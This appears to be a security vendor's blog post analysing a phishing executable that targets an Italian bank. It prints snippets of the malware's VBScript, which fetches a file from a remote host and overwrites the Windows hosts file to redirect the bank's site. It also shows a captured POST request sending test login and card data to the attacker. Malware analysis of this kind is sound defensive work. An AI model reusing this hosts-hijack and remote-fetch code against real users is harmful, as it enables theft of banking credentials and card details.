Phishing is Still Alive and Kicking

A few days ago McAfee Avert Labs came across yet another example of how effective and especially dangerous phishing can be. We received a sample in the form of an .exe file that when executed would start Internet Explorer and present the login page of a well-known Italian bank.

At first sight, for the inexperienced and security-unaware user, the Web site looked exactly like the real thing. There were no obvious signs of fraud as “only” the user name and password to get into the banking page were requested. Once these initial credentials were inserted, a second page requested a card number, the expiration date, and the CVV2/CVC2 number. After this, you guessed it, a simple message–”Wrong details, try again!”

What actually happened is that the sample creates the file finaltemp.vbs and runs it immediately via the Windows Script Interpreter, wscript.exe. The VBS script is immediately removed from the system. Here are some interesting snippets of the code embedded into the executable:

Set WshShell = WScript.CreateObject("WScript.Shell")
strURL = http://x.x.x.x/twiki/b.txt
Dim fso
Set fso = CreateObject("Scripting.FileSystemObject")

More code creates some objects used to write the contents of the file through HTTP requests using Microsoft.XmlHttp.

fileToCopy = fso.GetSpecialFolder(WindowsFolder).Path & "\system32\drivers\etc\hosts"

This will copy the content of the b.txt, seen above, to the host file–leading to compromised name resolution!

WshShell.Run "iexplore.exe"
Set aFile = fso.GetFile(strOutFile)
aFile.Delete

This will run Internet Explorer, opening the main page of the bank with what looks like the correct address for the bank in the browser’s address bar; however, this ultimately points to the bad IP set in the modified host file. At this stage the unaware user enters his or her information on the page, which gets sent to a remote location that is certainly not the secure bank environment. All of this happens silently–without any popping cmd shells, active objects complaints from IE, or any other suspicious activity.

If we look at a packet-sniffer trace, we can see the POST request made to the URL mentioned in the snippet above. It was registered through (no kidding!) Godaddy.com. Also we will see all the requests made to the IP written to the host file that was modified by the VBS script–including a POST containing the username, password, card number with the security code, and expiry date. (In this case you can see that the Avert Labls account with password “testing” is now officially owned.)

POST /index.php?MfcISAPICommand=ProcessCC&UsingSSL=1&login=labs&
pass=TESTING HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://X.X.X.X/index.php?MfcISAPICommand=VerifyFPP&UsingSSL=1&login=&pass=
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: poste.it
Content-Length: 165
Connection: Keep-Alive
Cache-Control: no-cache

Session=cvv2.gif&password=TESTING&ccnumber=6666666666666666&
month=10&year=10&
cvv=666&__EVENTTARGET=RicaricaCartaPPayPagamentoPPayEdit1%3AbtnContinua&__EVENTARGUMENT=HTTP/1.1 200 OK
Date: Fri, 14 Mar 2008 18:00:39 GMT
Server: Apache/2.2.3 (Debian) DAV/2 SVN/1.4.2 PHP/5.2.0-8
X-Powered-By: PHP/5.2.0-8
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=ISO-8859-1

It seems that phishing will remain a part of our daily lives. And what is most alarming is the ease with which someone could change a few lines of the scripts to redirect the user to whatever site that requires authentication and grab very sensitive information which could be use to steal money as well as any other type of information.

So far the Web site hosting the modifications required for the host file and the IP hosting the fake pages are still live and sending data, so you can imagine how much could be gathered in just a few days or even a few hours. The reverse DNS details for the IP appear to be forged. We have contacted the owner of the IP and the bank itself to investigate further and have the fake site shut down as soon as possible.
Visit.geocities.com and geo.yahoo.com were involved, as well, probably for tracking purposes.

Safe banking, folks!